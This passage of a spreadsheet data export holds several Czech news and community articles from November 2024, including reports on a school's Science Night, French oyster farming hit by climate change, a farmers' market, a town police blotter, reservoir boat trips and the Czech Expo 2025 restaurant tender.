International 25. Discoland 26. Ej Áj 27. Persony EN friendly 28. Mýcení EN friendly 30. Šubyduby 1. premiéra Začátky představení v 19.00, není-li uvedeno jinak.</t>
  </si>
  <si>
    <t>20241101_668_3239761837_a2e6c5356312aee23ef6.html</t>
  </si>
  <si>
    <t>a2e6c5356312aee23ef6</t>
  </si>
  <si>
    <t>Proměna nám sedla</t>
  </si>
  <si>
    <t>Proměna nám sedla Tématem Noci vědců 2024 byla proměna a my měli jedinečnou možnost podívat se, jak se tato akce proměnila za posledních deset let. 27. 9. jsme nainstalovali výstavu plakátů všech ročníků, kterých jsme se dosud zúčastnili, a otevřeli dveře gymnázia přílivu návštěvníků. Letos na ně čekaly v našich laboratořích tradiční workshopy s rozšířenou nabídkou aktivit. V chemii se kouzlilo se zkumavkami (a vyrábělo se zlato), v chodbě u fyziky létala raketa a v aule děti vyráběly frkačky a magické korálky . V biologii mohli návštěvníci pod mikroskopem studovat vývoj hmyzu a o patro výše jsme nabízeli náhled do proměn českého pravopisu. V učebně IVT se vystřídala přednáška o fenoménu Cosplay a úniková hra na téma Kafkovy Proměny. Toto téma návštěvníky ještě čekalo v přednášce našich maturantek věnované rozboru knihy. Španělsko nám přiblížili dva dobrodruzi, kteří v létě urazili 800 km pěšky do Santiaga de Compostela , a studentky Karla s Amálkou, které tam byly na studijním pobytu. Sérii přednášek obohatili naši učitelé i bývalí studenti povídáním a experimentováním na nejrůznější témata, od fyziky, přes biologii, ekonomii až po dějepis. Hlavním vchodem prošlo letos na Noc vědců 680 návštěvníků, a tak můžeme s hrdostí konstatovat, že ať se za posledních deset let proměnilo cokoli, obliba naší akce neklesá a stále máme veřejnosti co nabídnout. Děkujeme všem za přízeň a těšíme se na viděnou zase za rok. Autor: Za organizátory Mgr. Milena Lockerová, GFMP Autor person Milena Lockerová</t>
  </si>
  <si>
    <t>20241101_669_3239762989_6e5c8995f3e02e78d929.html</t>
  </si>
  <si>
    <t>6e5c8995f3e02e78d929</t>
  </si>
  <si>
    <t>Přijdou Francouzi o tradiční pochoutku?</t>
  </si>
  <si>
    <t>Přijdou Francouzi o tradiční pochoutku? Rubrika: GASTRONOMIE Vyhlášená francouzská pochoutka je na ústupu. Ústřicím škodí změna klimatu, mnoho z nich umírá a jejich chovatelé se ocitli v krizi. Zmizí tradiční pokrm z restaurací a svátečních tabulí? Tony Brin stojí po kolena ve vodě, na sobě má krátké tričko a vysoké rybářské holínky. Z koše vysype ústřice – tradiční francouzskou pochoutku s vůní moře – a pak je rukama zběžně přebírá. Když jejich lastury narazí jedna do druhé, vydává to zvláštní chrastivý zvuk. Brin ukazuje, že tento „vzorek“ je mrtvý. „Za posledních deset let bojujeme s tím, abychom udrželi naše ústřice naživu. Umírá jich celkem 30 až 50 procent,“ popisuje muž, který se chovu těchto mořských mlžů věnuje od svých patnácti let. ROZPADAJÍ SE JIM LASTURY Na písečném ostrově Ré, který leží jen kousek od západofrancouzského města La Rochelle , vlastní ústřicovou farmu. „Jsme ve ztrátě. Nikdy jsem nezažil takovou krizi jako nyní,“ vysvětluje pro francouzskou televizi TF 1 a ukazuje na křehké skořápky. Přichází podle svých slov o stovky mlžů, bez kterých si někteří Francouzi neumí představit slavnostní večeři na Štědrý den nebo na silvestra. Ústřicím škodí rostoucí teplota vody v oceánu. Ať už je léto, nebo zima, jejich okolní prostředí je kvůli citelnějším klimatickým změnám stále teplejší. „V prosinci je 17 stupňů. To je jako v dubnu,“ podotýká Brin, podle něhož pak ústřice rostou až příliš rychle a kvůli tomu je jejich lastura velmi křehká. To má další vliv na jejich zdraví. Nedokážou se dostatečně chránit před vodou, která je v oceánech stále kyselejší. A čím je kvalita vody horší, tím snadněji se lastura rozpadá. Chovatelé se tak dostávají do začarovaného kruhu, ze kterého nemohou vystoupit. Vyšší teploty ústřicím škodí i z dalších důvodů. Ještě než skončí ve francouzských restauracích nebo na svátečních tabulích u lidí doma, musí být zbaveny různých nečistot. Proto je Brin, stejně jako další chovatelé, nejprve přestěhují do zvláštních nádrží s čistou vodou. Jenže v nich je voda často ještě mnohem teplejší než v oceánu. „Pokud přesáhne 30 stupňů, všechny ústřice zemřou,“ upozorňuje Fany Marié, drobná žena, která se také živí jejich chovem. Hledala proto cesty, jak mlže zachránit, aby se nedostala do situace, kdy o velkou část svého chovu přijde. Musela investovat na 40 tisíc eur, tedy v přepočtu asi milion korun, do speciálního systému na ochlazování. Díky němu se teplota v nádržích drží stabilně na 14 stupních. Tím ale dodatečné náklady nekončí. Marié si kvůli tomu musí měsíčně připlatit za elektřinu 400 eur, což je zhruba deset tisíc korun. „Jsou to velké náklady. Pokud ale chceme prodávat ústřice v létě, není jiná možnost, než že se pokusíme přizpůsobit. S vyššími teplotami to jinak nejde,“ konstatuje. Podobně postupují i další, kteří se chovu ústřic věnují. U některých se dodatečné náklady na elektřinu kvůli chladicím systémům vyšplhaly až na 1300 eur měsíčně, tedy téměř 33 tisíc korun. Ani budoucnost není podle vědců optimistická. Čím více v letních měsících rtuť teploměru stoupá, tím je to pro ústřice nebezpečnější. V těchto měsících jsou na vyšší teploty navíc citlivější, protože se tou dobou rozmnožují. Ve vodě se také snižuje obsah kyslíku. Někdy se i přemnoží bakterie či viry, které tyto mlže ohrožují. Příkladem je herpesvirus OsHV-1, který je může ohrozit zejména v případě, že se teplota vody pohybuje v rozmezí od 16 do 24 stupňů – což je třetinu, někdy dokonce i polovinu roku. Riziko je to zejména pro mladé živočichy. POKLES PRODEJŮ KVŮLI STRACHU Klimatické změny, které jsou doprovázeny velkými výkyvy počasí a častějšími extrémními jevy, loni o vánočních svátcích zasadily celému odvětví velkou ránu. Francouzským tiskem tehdy proletěla zpráva, že několik lidí po konzumaci ústřic onemocnělo. Nakazili se norovirem, který způsobuje někdy i vážné zažívací potíže doprovázené dehydratací. Na vině byli především mlži z Arcachonského zálivu, který leží poblíž západofrancouzského města Bordeaux, a také z menších lokalit v Bretani a Normandii . Silné přílivové deště zaplavily tamní čističky odpadních vod a část znečištěné vody se dostala do oceánu, někdy až právě k ústřicím. Francouzské úřady proto načas zakázaly prodej nejen ústřic, ale také dalších mořských živočichů z postižené oblasti. Mnozí Francouzi se poté báli ústřice nakupovat a jíst, i když šlo o mlže z jiných koutů země. Philippe Morandeau, šéf regionální asociace producentů z francouzské oblasti Charente- -Maritime, se nechal slyšet, že mu prodeje klesly o 25 až 30 procent. „Lidé si přečtou jen titulek a už si nezapamatují, kde k tomu došlo,“ postěžoval si. Kvůli častějším výkyvům počasí navíc může podobných případů přibývat. AVOKÁDA NA KORSICE , PISTÁCIE V PROVENCE Ústřice ale nejsou jedinou pochoutkou, o kterou by Francouzi mohli přijít kvůli stále výraznějším klimatickým změnám, jež přinášejí častější a delší sucha. Na seznamu jsou i další položky: meruňky z oblasti Roussillon , vína z Burgundska nebo rýže z jihofrancouzského regionu Camargue , který je proslulý zejména chovem polodivokých bílých koní nebo býků. Této plodině škodí nejen sucha, ale také stále slanější voda. V Camargue se přitom produkuje zhruba 30 procent francouzské spotřeby rýže. Někteří zemědělci ve Francii proto hledají cesty, jak se s novou situací vyrovnat. Zkoušejí například pěstovat jiné plodiny. Třeba i ty, které nejsou pro francouzské regiony nijak typické, ale dovedou si se změnou klimatu lépe poradit. Zemědělci v Bretani sází vinnou révu, zatímco na Korsice přibývají farmáři, kteří zkoušejí pěstovat avokáda – jen loni se tam vypěstovalo přes 200 tun tohoto zeleného ovoce, jehož popularita stále roste. „Je to pro nás nová plodina. Je to tedy celkem výzva, protože s tím nemáme zkušenosti,“ řekl Paul- Vincent Casanova , který investoval 200 tisíc eur, tedy asi pět milionů korun, do sadu čítajícího 1300 stromů. Jiní se zase vracejí k plodinám, které se v oblastech dříve v menším měřítku pěstovaly, například k pistáciím. Ty se ve Francii objevovaly do 19. století. Nyní rostou na zhruba 400 hektarech, z toho 250 připadá na Provence . A další brzy přibudou. Nahrazují tak mimo jiné pole s obilím, nebo dokonce olivovníky. ■ FOTO: ČTK / ŠULOVÁ KATEŘINA FOTO: SVETLANA BACHEVANOVA / ZUMA PRESS / PROFIMEDIA Čím více v letních měsících rtuť teploměru stoupá, tím je to pro ústřice nebezpečnější. Autor: TEXT: SIMONE RADAČIČOVÁ Autor Simone Radačičová Rubrika transition_slide GASTRONOMIE</t>
  </si>
  <si>
    <t>7500</t>
  </si>
  <si>
    <t>20241101_67_3264703619_126bd7902076b2c865aa.html</t>
  </si>
  <si>
    <t>126bd7902076b2c865aa</t>
  </si>
  <si>
    <t>Sobota 2. listopadu – nakupte skvělé uzeniny u stánku Řeznictví Chomutov</t>
  </si>
  <si>
    <t>Sobota 2. listopadu &amp;amp;#8211; nakupte skvělé uzeniny u stánku Řeznictví Chomutov Farmářský trh Kubáň Sobota 2. listopadu – nakupte skvělé uzeniny u stánku Řeznictví Chomutov Řeznictví Chomutov už k nám nějakou dobu pravidelně zavítávají. Ochutnali jste od nich všechno? Na jejich pojízdném stánku najdete třeba domácí vepřovku, škvařené sádlo, uzená žebra, ocásky, dršťkovou polévku, paštiky, domácí jitrnice, jelítka, tlačenku, sulc, špekáčky, párky, voňavé domácí klobásy, uzený bok, uzené i dušené šunky, koňské buřty, točený salám nebo čerstvé výsekové maso… Vše v prvotřídní kvalitě a neuvěřitelně chutné! Zastavte se a zásobte se dobrotami na víkend! A ještě jedna zpráva: Možná jste si všimli, že na našem Facebooku se dějí podivné věci. A tady je důvod – naši stránku napadl hacker. Bohužel jsme o ni dočasně přišli a momentálně nemáme přístup. Snažíme se to vyřešit, ale komunikace s Facebookem je jako mluvit do zdi – odpovídají jen roboti a celý proces je na dlouhé lokte. Založili jsme pro to nový účet – Farmářský trh na Kubáni – oficiální. Budeme moc rádi, když jej označíte „SLEDOVAT“. Budeme zde opět uveřejňovat aktuální informace. Najdete jej TADY Děkujeme. Na trhu naleznete stánky těchto prodejců: MASO, UZENINY Krůtí farma Brniště - čerstvé drůbeží maso a uzeniny Drůbeží farma Holýšov - pomalu rostoucí drůbež, kuřata, kachny, masité slepice NOVINKA Řeznictví Chomutov - kvalitní domácí uzeniny, vepřové a hovězí maso MLÉKO, SÝRY, VEJCE Farma Chouranice - biomléko, vajíčka z chovu s volným výběhem, domácí tvaroh a sýry Bačova salaš - tradiční slovenské ovčí sýry, parenice, oštiepok, nitě, bryndza, žinčica, a slovenské uzeniny, špeky, klobásky a slanina. Vejce Kosičky - vejce z podestýlkového chovu, křepelčí vejce. Holandský kluk - velký výběr sýrů ZELENINA, OVOCE Zelenina Malých - čerstvá zelenina, bylinky, květiny ze zahrady Zelenina Kloubských - čerstvá zelenina, bylinky, květiny Zelenina Dřísy Robin Machka - čerstvá zelenina, velký výběr salátů, batáty, bylinky, cibule, jablka... Ovocnářství Jelínek - jablka, hrušky, švestky, ovocné mošty, med ze sadu Sellanomer - rakytník a jižní ovoce KVĚTINY Květinářství Hakl - vázané květiny, sazenice Květinářství Buket Flowers - luční kytice, pivoňky a pivoňkové tulipány Zahradnictví Semela - sazenice květin PEKÁRNA, CUKRÁRNA Pekárna Velíšek - vánočky, kváskový, žitný i pšeničný chléb, chléb dýňový, mrkvový, ořechový, koláče, štrůdly… Pekárna Náš chléb - kváskový žitný i pšeničný chléb, chléb dýňový, mrkvový, ořechový, koláče, štrůdly, rohlíky, ručně pletené housky, cukroví. Karlovarské cukrářství - koláče, kremrole, štrůdly, perník, věnečky a větrníky Máminy makronky - domácí makronky Maminčiny domácí trubičky - domácí kremrole Pekárna pod Anežkou - domácí frgály Louskáček - výběrové zákusky a dorty s oříšky DELIKATESY Vinařství Mikulica - výběrová vína z Moravy , bylinné sirupy, chlazené limonády Čočkýna - křupavé pochoutky z čočky, bez lepku, plné proteinu Bylinné sirupy - sirupy z bylin Marmeládový mlýn - domácí marmelády a džemy Med Švoma - domácí med, perníčky, svíčky ze včelího vosku, surový propolis med Dostál - výběrový med z chráněné oblasti České středohoří farma Milan Paleta - kvašená zelenina Hubingerovi - široký výběr koření Pražské houby - léčivé netradiční houby More than Nuts - baklava, oříšky a další speciality Malá Itálie - italské speciality, výběrové sýry a uzeniny OBČERSTVENÍ Rybí gril u Pepy - grilovaný candát, kapří hranolky, uzené ryby, rybí karbanátky, někdy zeleninové palačinky Václav Bouša - grilovaná kuřata a vepřová kolena Café Majada - káva z Jižní Ameriky : capuccino, espresso, latté od baristy Ukrajinské pelmeně - pelmeně z různou náplní Řemesla E. Hodánková - ručně vyráběné stromky štěstí, náramky z korálků Miyuki, minerály, macramé stojící Andělky... Renáta Braná - dekorace, šperky Antikvariát - dětské knihy, encyklopedie, beletrie... Atelier Markéta Kulhánková - originální dětské oblečení pan Novák - lněné a bavlněné utěrky s originálními vzory paní Helvigerová - dámské originální oblečení Růžové oleje - přírodní oleje z růžových květů Ateliér Špalíček - originální keramika Tereza Plicková - ručně šité oblečení, dámské, dětské kabelky, taštičky TamarinZOO - chovatelské potřeby Patchworkování - originální utěrky, deky, polštářky Obaly na potraviny - voskované pytlíky na potraviny Krémy Nutt - krémy z bio bambuckého másla s levandulí, santalem, kurkumou... Dřevotéka - dřevěné hračky a pomůcky do kuchyně Zahradnictví Macháček - podzimní dekorace Beelinka decorations - podzimní dekorace ze sušených květin Nejbližší akce Sledujte nás na sociálních sítích Heřmaňák Náplavka Kubáň Autor: Blanka Rubrika transition_slide Uncategorized @cs</t>
  </si>
  <si>
    <t>589</t>
  </si>
  <si>
    <t>545</t>
  </si>
  <si>
    <t>20241101_670_3239753708_4c053dc7f936f4d571f7.html</t>
  </si>
  <si>
    <t>4c053dc7f936f4d571f7</t>
  </si>
  <si>
    <t>Šternberské stíny: Alkohol za volantem, ztracené klíče a záchrana dítěte. Příběhy z ulice pod dohledem městských strážníků</t>
  </si>
  <si>
    <t>Šternberské stíny: Alkohol za volantem, ztracené klíče a záchrana dítěte. Příběhy z ulice pod dohledem městských strážníků HLAVA JI Z TOHO NEBOLELA. Situaci kolem malého dítěte, kdy matka konzumovala alkohol s přáteli, řešili strážníci v sobotu 21. září před 18. hodinou. Jak uvedla žena, která dechovou zkoušku odmítla, o víkendu vypila s přáteli lahev rumu. Zjevně ale byla podle vlivem alkoholu a o promočené dítě se neměl kdo zodpovědně postarat. Proto na místo strážníci přivolali pracovnici OSPOD, která situaci pohotově vyřešila umístěním dítěte k příbuznému. Matka si zavolala taxi a odjela do blízké obce. ZÁVADA V ELEKTRICE. K požáru vozidla odtahové služby došlo 23. září kolem deváté večer před železničním přejezdem do Lhoty . Řidič, který nebyl schopen již sám požár uhasit, přivolal hasiče. Motorová část ale již byla zničená. Strážníci asi hodinu na místě usměrňovali provoz, příčinou vzniku požáru byla pravděpodobně závada na elektroinstalaci nebo v pojistkové skříni. ZÁJEMCI POŘÁD JSOU! Policii České republiky bylo v pondělí 30. září předáno oznámení na podezření o nesprávném zacházení se zvířaty. Věc oznámil člověk, který si již za podivných okolností koupil štěně od lidí, kteří se podezřele chovali a zatajovali důležité informace o psovi, který brzy začal projevovat zdravotní potíže a také byl zablešený. Když se nakonec na Jívavské ulici domohli vrácení zvířete i části peněz, přijela stříbrná Škoda Octavia. Muž, který z ní vystoupil, se choval zvláštně a ukrývaje něco pod bundou, zmizel v blízké budově. Vypadalo to na další štěně. Na místě se nakonec strhl konflikt doprovázený výhrůžkami a nadávkami. Roztomilý pejsek plemene pomeranian byl nabízen asi za dobrou cenu… Bohužel takový „nákup“ se ne vždy vyplatí…. NAŠTĚSTÍ BEZ VÁŽNÉHO ZRANĚNÍ! Do koryta Sitky vedle koupaliště havaroval nad ránem v pondělí 7. října řidič kamionu, pravděpodobně poté, co usnul za volantem. Zbořil velkou část nedávno rekonstruovaného zábradlí a jeho vyprošťování po vyšetření nehody trvalo až do poledne. Do toku unikla také část náplně z proražené palivové nádrže vozidla. Po dobu činnosti jednotek IZS strážníci i zde usměrňovali provoz. TŘIKRÁT DVA VOUSÁČI. Navečer 7. října řešili strážníci také oznámení o podnapilých hostech v ubytovacím zařízení. Dva muži zde chtěli přespat, aby tak řešili problém s bydlením po vystěhování. Ovšem to by se museli chovat jako řádní hosté. Zanedbaný vzhled, viditelné hygienické nedostatky a chování, kterým obtěžovali ostatní hosty, vedlo personál k tomu, že raději dvojici odmítli. Za přítomnosti hlídky pak oba odešli. Vrátili se ale k domu, kde oba spolu bydleli, ale projíždějící řidič upozornil na to, že nekontrolují svůj pohyb vlivem požitého alkoholu . Přivolaná hlídka zjistila u jednoho hladinu alkoholu 2,7 promile a druhému kolovalo v krvi dokonce 4,25 promile. V součinnosti s hlídkou Policie ČR byly obě osoby po prohlídce přivolaným lékařem převezeny k vystřízlivění na záchytnou stanici do Olomouce . Již další den odpoledne ale volali z prodejny Penny market na Jívavské ulici, že zde tito dva muži znečišťují prostor vedle prodejny, oba byli nalezeni sedící na zemi a jeden z nich zde porušoval vyhlášku města tím, že pil plechovkové pivo . Navíc vykazoval známky poranění na hlavě po pádu. I s 2,88 promile tak nemířil na záchytku, ale sanitkou do nemocnice k dalšímu vyšetření. UŽÍVÁ SI JI NĚKDO JINÝ. Muž s ukrajinským pasem nyní přebývající v našem městě, oznámil ve čtvrtek 10. října krádež zánovní elektrokoloběžky. Přijel na ní odpoledne spolu s dětmi navštívit příbuzného v centru a zaparkoval ji nezajištěnou v chodbě neuzamčeného domu. Když v 19 hodin odcházel, černá koloběžka URBIS U3.1 s doplňkovým sedátkem a blikačkou již na místě nebyla. Pravděpodobně bude „exportována“ dál, podobně jako štěňata. Poškozenému vznikla škoda asi 7 000 korun. LÉČEBNA NENÍ NOCLEŽNA. Vrátný z psychiatrické léčebny oznámil o půlnoci na neděli 16. září, že se v areálu pohybuje neznámý muž, který se pak uschoval v jedné z budov. Požádal o pomoc při řešení situace. Naše autohlídka po chvíli nalezla podnapilého muže středního věku, který uvedl, že pouze hledal nějaké místo k přespání. Po kontrole, zda nejde o hledanou osobu, byl vypoklonkován za bránu areálu. MOŽNÁ LOVIL MINCE. Asistenti prevence kriminality upozornili v pátek 18. října před desátou dopoledne na muže bez trvalého přístřeší, který se pohyboval u historické studny na Horním náměstí a choval se podezřele, jako by se snažil něco ze studny vytáhnout. Hlídce podal vysvětlení v tom smyslu, že mu do studny spadl klíč od zámku ke kolu. Kolo přitom neměl, jiné vysvětlení svého podivného jednání nevymyslel. Nastávající víkend tak strávil nejspíš jako pěšák. (strážník Ladislav Prášil Městská policie Šternberk)</t>
  </si>
  <si>
    <t>20241101_671_3239786353_a3566128cf8fd340f5f9.html</t>
  </si>
  <si>
    <t>a3566128cf8fd340f5f9</t>
  </si>
  <si>
    <t>Barvy podzimu si turisté vychutnají i z paluby lodi</t>
  </si>
  <si>
    <t>Barvy podzimu si turisté vychutnají i z paluby lodi KRAMOLÍN Strmé skalnaté břehy zasazené do podzimních rámů z pestrobarevného listí stromů i keřů, opuštěné pramice a další loďky pohupující se u pobřeží, kormoráni poklidně odpočívající na borovicích, pár rybářů číhajících s udicemi na svůj úlovek. Takové scenérie nyní nabízí okolí Dalešické přehrady . Lidé se navíc mohou tamní přírodou kochat nejen coby cyklisté nebo pěší turisté, ale klidně i pohodlně, v sedě, a k tomu rovnou z vodní hladiny. Stačí nastoupit na palubu výletní lodi Horácko , která brázdí nádrž jak v hlavní letní sezoně, tak v tyto podzimní dny, a pak dokonce i v zimě. „Příroda teď opravdu hýří všemi barvami, všechno je krásně zbarvené – od žluté, oranžové a hnědé až po tóny červené. Když do toho zasvítí i sluníčko, je to nádhera. A oproti létu je tady teď samozřejmě výrazně klidněji,“ popisuje atmosféru kolem vodního díla Milan Jahoda, dlouholetý kapitán výletní lodi Horácko . Příznivé počasí láká Uplynulý víkend se měly konat již poslední pravidelné plavby, vzhledem k příznivé předpovědi počasí ale vyrazí loď na projížďku ještě tuto sobotu 2. listopadu. Vypluje opět z přístaviště Kramolín , a to hodinu po poledni. Do cílového Koněšína dorazí plavidlo za pětašedesát minut a po otočení se vrací zase zpět do kramolínského přístaviště. Zájemci tak mohou na palubě strávit klidně i více než dvě hodiny, anebo se svézt pouze mezi některými stanicemi na trase. Mnozí výletníci volí kombinaci chůze a plavby – nechají se třeba kousek „popovézt“ lodí a zpáteční trasu potom absolvují pěšky. Mladá vína na palubě Ani pro nadcházející podzimní a zimní období však sezona vyjížděk ještě zdaleka nekončí. Na svátek svatého Martina , tedy na pondělí 11. listopadu, je v plánu tradiční Svatomartinská plavba. „Je to akce, která se koná už dlouhé roky. Vynechali jsme snad jenom jednou, když ji nebylo možné uspořádat kvůli covidu,“ líčí kapitán. Vyjížďka, jež startuje v deset hodin ráno, je spojena s obligátním otevřením a ochutnávkou letošních mladých svěžích vín pocházejících ze Sádku, jediné vinice a vinařství na Vysočině. K jejich otevření dojde podle tradice – přesně jedenáct minut po jedenácté hodině dopolední. „Chybět nebude ani porcička netradičně upravené svatomartinské husy a mnohé další dobroty,“ popisuje Milan Jahoda. Ten se těší hlavně na přátelskou atmosféru, s níž je akce vždycky spojena, neboť na ni řada lidí míří již opakovaně. „A z mnohých návštěvníků se tak nakonec postupně stali i naši přátelé,“ usmívá se kapitán. Účast je potřeba si předem rezervovat, dle Jahody však ještě nějaká volná místa jsou. Na další plavbu se mohou zájemci vydat v neděli 17. listopadu; a loď nebude zahálet ani v prosinci. Dalešice jsou přečerpávací nádrží a hladina tak v zimě nikdy zcela nezamrzá. Horácko tudíž může přislíbit vyjížďky i na 26. prosinec, silvestr či na Nový rok. „Tyto zimní termíny si u lidí získaly oblibu. Na Štěpána už mají lidé dost cukroví, pohádek i návštěv a rádi si svátky zpestří třeba právě plavbou. A přelom roku je zase zajímavým a netradičním vstupem do dalšího období,“ shrnul Jahoda s tím, že v případě příznivého počasí není ani vyloučeno, že bude ještě nějaký další termín plaveb vypsán. Také mimo sezonu Břehy Dalešické přehrady jsou specifické minimem zástavby. A nachází se na nich i řada turistických zajímavostí. Na trase mezi Kramolínem a Koněšínem mohou lidé z lodi spatřit třeba Wilsonovu skálu, Stropešínský most či ostrovní zříceninu hradu Kozlov. Foto: Jana Nedělková , MAFRA Autor: — Jana Nedělková Autor Jana Nedělková</t>
  </si>
  <si>
    <t>17430</t>
  </si>
  <si>
    <t>20241101_672_3239787861_ad4f6c4b5ff82b7b3c22.html</t>
  </si>
  <si>
    <t>ad4f6c4b5ff82b7b3c22</t>
  </si>
  <si>
    <t>Svíčková na Expu od mistrů suši?</t>
  </si>
  <si>
    <t>Svíčková na Expu od mistrů suši? Podmínkám pro provozování restaurace v českém pavilonu na výstavě Expo v Ósace mohou zřejmě vyhovět jen místní firmy, přiznává komisař Soška . Výběrové řízení na provozovatele restaurace na prestižní světové výstavě bylo zveřejněno ve věstníku veřejných zakázek na konci září. Zájemci se mohli hlásit do úterý. Předpokládaná hodnota koncese je devadesát milionů korun. Možnost reprezentovat českou gastronomii na prestižní výstavě bude mít firma, která nabídne nejvyšší procento z obratu. Vyplývá to z návrhu smlouvy, která je také součástí zakázky. Nájemce se může těšit na vybavenou kuchyň, kterou na své náklady zajistí kancelář generálního komisaře. „Čisté náklady na vybavení restaurace a jejího zázemí se budou pravděpodobně pohybovat mezi cca dvěma až třemi miliony korun. Pokud se návratnost investice bude pohybovat přes padesát procent, budu velmi spokojený,“ řekl Deníku N generální komisař české účasti Ondřej Soška . JAPONSKÁ LICENCE Do výběrového řízení se mohou hlásit zájemci, kteří v posledních pěti letech provozovali za hranicemi restauraci o minimální kapacitě 200 míst. Musí také složit jistotu ve výši jednoho milionu korun. Jenže české firmy se svým kuchařským uměním v Japonsku asi neblýsknou. Podle návrhu smlouvy totiž musí provozovatel restaurace do sedmi dnů od podpisu smlouvy prokázat, že má oprávnění na provoz restaurace a gift shopu a prodej alkoholu v Japonsku . Sám Soška přitom redakci sdělil, že podle něj je to pro české firmy podmínka těžko splnitelná. „Ačkoliv neznám úplně všechny české firmy podnikající v gastronomii, mám dostatečné důvody se domnívat, že firem s licencí pro japonský trh v Česku příliš nebude,“ napsal redakci. Potenciální šéfkuchař bude mít také dost svázané ruce, co se týče výběru jídel. Přesné recepty, jejichž příprava je v restauraci požadována, má zadané předem. „Partner není oprávněn recepty zahrnuté v koncepci jakkoli měnit nebo do nich zasahovat bez písemného souhlasu KGK,“ píše se v kontraktu. Například restauratér Matouš Petráň se proto domnívá, že neshánějí šéfkuchaře. „Tohle není pro restauratéra, který by se tam chtěl předvést, ale je to spíše pro člověka, který si logisticky umí spočítat, že se mu to vyplatí, a je to víc robot. Ale asi to dokážu pochopit,“ vysvětlil Petráň. Podle něj to není obvyklý postup, ale domnívá se, že je to dané specifickou situací a tím, že se jedná o prezentaci Česka v zahraničí. O něco příkřeji zakázku hodnotí majitel restaurací a člen představenstva Hospodářské komory a Asociace malých a středních podniků Luboš Kastner. „Proč by někdo brífoval recepty? Ať nabrífuje směr menu a nechá si lidi zasoutěžit. Ale co je mu do toho, ať dá zadání, že chce českou kuchyni, a nechá prostor kreativitě, ale ať nebrífuje recepty!“ shrnul své dojmy Kastner. Soška to vysvětluje už zmíněným očekáváním, že se do výběrového řízení nepřihlásí žádná česká firma kvůli přísným podmínkám podnikání a požadavkům na vlastnictví speciální licence. Navíc – v kuchyni pavilonu se nebude jídlo vařit, ale pouze ohřívat a dokončovat. „Partner bere na vědomí, že s ohledem na limity prostoru pavilonu není možné mít v předmětu nájmu plnohodnotnou kuchyň a sklad potravin,“ uvádí smlouva. „Naším cílem je servírovat cca 2000 porcí jídla denně. Na pavilonu máme velmi omezené místo pro kuchyni i skladovací prostory. S ohledem na pravidla organizátora budeme moci suroviny do pavilonu zavážet jen v nočních hodinách. Zkuste si zajít do nějaké větší pražské restaurace, kde servírují stovky jídel denně, a nechte si ukázat zázemí plnohodnotné kuchyně, ať si uděláte představu, jak to funguje,“ odpověděl Soška na dotaz, proč nebudou pokrmy v restauraci vařit čerstvé. Provozovatel restaurace si z toho důvodu bude muset v Ósace sehnat sklad, a to necelý půlrok před konáním této exponované a prestižní akce. „Partner se vedle skladovacích prostor pro své zásoby zavazuje na svůj náklad zajistit také skladovací prostory pro výrobky dodavatelů restaurace, tj. sklad s prostorem pro umístění minimálně tří palet a potřebným chlazením,“ specifikuje smlouva. To je další důvod, proč jako partner připadá v úvahu zřejmě jen japonská firma. Podmínky výběrového řízení byly přitom zveřejněny v českém věstníku veřejných zakázek. Tři nejdůležitější dokumenty mají i anglickou verzi a předem operují s platbami v japonských jenech. Není ale jasné, zda se o výběrovém řízení mohly dozvědět japonské firmy. Redakce se na to zeptala generálního komisaře, ten ale neodpověděl. KONCEPCE OD ZNÁMÉHO Z DUBAJE Japonský provozovatel restaurace tak bude muset vařit podle českých receptů, přiznává Soška . „Neočekávám, že by japonské gastro firmy byly specialisty na českou kuchyni. Proto jsme si nechali připravit Food &amp;amp; Beverage koncepci (F &amp;amp; B koncept) od renomovaného specialisty Tomáše Regera,“ vysvětlil. Provozovatel restaurace může využít služeb „kulinářského kurátora“. Ten může pomoci seznámit se s postupem přípravy receptů, proškolí personál nebo poskytne konzultaci týkající se provozu restaurace. Kancelář generálního komisaře loni v červenci uzavřela se šéfkuchařem Tomášem Regerem smlouvu v hodnotě 602 tisíc. Měl radit s náplní menu, cenotvorbou, optimalizací nákladů nebo s personálem. Reger stejně jako Soška pracoval v Dubaji a odtamtud se znají, jak před časem Soška sám přiznal. Podle generálního komisaře byl Reger jedním ze tří oslovených, kteří měli za úkol připravit strategii provozu restaurace. „Pan Reger spolupracoval se společností Lexus , pro kterou v Dubaji svého času otevíral restauraci, takže má velice bohaté zkušenosti s asijskou kuchyní a kulturou. V podstatě připravil Food &amp;amp; Beverage studii, na základě které my v těchto dnech začínáme připravovat veřejnou zakázku na provozovatele restaurace,“ vysvětloval Soška v půlce března, proč si vybral právě Regera a uzavřel s ním smlouvu. MÍSTO POHLREICHA Zda bude Reger po dobu trvání Expa „kulinářským kurátorem“, není jasné. Na dotaz týkající se prodloužení smlouvy s ním nebo uzavření nové přes příslib i urgence neodpověděl komisař ani jeho mluvčí. Podle smlouvy bude „kulinářský kurátor“ oprávněn kontrolovat provoz, dodržování receptů, vznášet k nim připomínky nebo udílet pokyny. Má se účastnit koordinačních schůzek s provozovatelem restaurace, kde se bude hodnotit její fungování. V koncepci, s níž se Soška prezentoval vládě, ovšem sliboval účast šéfkuchaře Zdeňka Pohlreicha . Ten ale v posledních měsících se Soškou nemluvil, jak řekl redakci. Na prezentaci menu byl podle něj brněnský šéfkuchař Reger. Víc se Pohlreich k celé věci vyjadřovat nechtěl. České recepty měl podle koncepce na místě realizovat šéfkuchař z Ósaky Yoshi Toku. „Jeho jméno je zárukou té nejvyšší kvality i dostatečné pozornosti v japonských médiích,“ vyzdvihl tehdy jeho kvality Soška. Nyní neodpověděl, zda se bude Toku v projektu dále angažovat. KONCEPCE OD POTÁPĚČŮ Kromě sycení návštěvníků bude mít za úkol nájemce i prodej upomínkových předmětů v gift shopu. Kancelář generálního komisaře ve smlouvě nabízí propojení fungování obou zařízení. „Smluvní strany sjednávají, že provoz restaurace a gift shopu spolu úzce souvisejí a budou koordinovány, např. možností objednání zboží z gift shopu v průběhu čekání na servis v restauraci apod.,“ je uvedeno v návrhu smlouvy. Jak Deník N napsal už v březnu, koncepci pro provoz obchodu s upomínkovými předměty vypracovala společnost Dive Point, která se specializuje na kurzy potápění a prodej techniky potřebné k ponoru. Kancelář za ni zaplatila 350 tisíc korun, nicméně ji nikdy nezveřejnila. Výběrové řízení na provozovatele restaurace připravila advokátní kancelář Pelikán Krofta Kohoutek a náklady na ni by podle registru smluv neměly přesáhnout 719 950 korun. Generální komisař české účasti na výstavě Expo 2025 Ondřej Soška . FOTO: LUDVÍK HRADILEK , DENÍK N Partner není oprávněn recepty zahrnuté v koncepci jakkoli měnit nebo do nich zasahovat. návrh smlouvy s 